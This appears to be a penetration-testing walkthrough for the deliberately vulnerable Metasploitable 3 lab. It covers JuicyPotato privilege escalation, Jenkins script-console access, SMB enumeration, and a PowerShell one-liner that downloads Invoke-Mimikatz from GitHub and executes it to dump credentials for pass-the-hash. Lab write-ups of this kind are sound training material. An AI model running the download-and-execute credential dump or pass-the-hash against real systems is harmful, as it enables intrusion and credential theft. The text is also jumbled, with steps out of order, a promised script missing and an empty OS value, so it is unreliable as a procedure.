3 Windows Walkthrough — Metasploitable
Upload JuicyPotato.exe via Evil-WinRM:
whoami /priv # Check if SeImpersonatePrivilege is enabled (It usually is!)
If you landed as a non-admin user but have SeImpersonatePrivilege, you can elevate to SYSTEM.
Developed by Rapid7 in collaboration with Vagrant, Metasploitable 3 is a deliberately vulnerable Windows machine designed to teach real-world Active Directory exploitation, misconfiguration management, and post-exploitation tactics. This is not a simple "click-and-exploit" box. It requires understanding Windows services, firewall rules, and privilege escalation vectors.
Once in Jenkins, go to "Manage Jenkins" -> "Script Console". This is a Groovy script executor. You can run:
# Download Mimikatz
iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -DumpCreds
NTLM hashes for Administrator, vagrant, and the machine account. You can now pass-the-hash to any other machine on the fake network.
Finding Flags
Metasploitable 3 has "flags" hidden in the file system.
enum4linux -a 192.168.56.102
Look for the share list. You will likely see C$ (Admin share) and ADMIN$. But also look for a share named vulnshare or similar. Note the OS version: . This OS is out of support—perfect.
Part 3: The Web Attack Surface (Low Hanging Fruit)
3.1 IIS Default Page (Port 80)
Navigate to http://192.168.56.102 in Firefox. You see the IIS welcome screen. Not much here yet, but directory busting is required.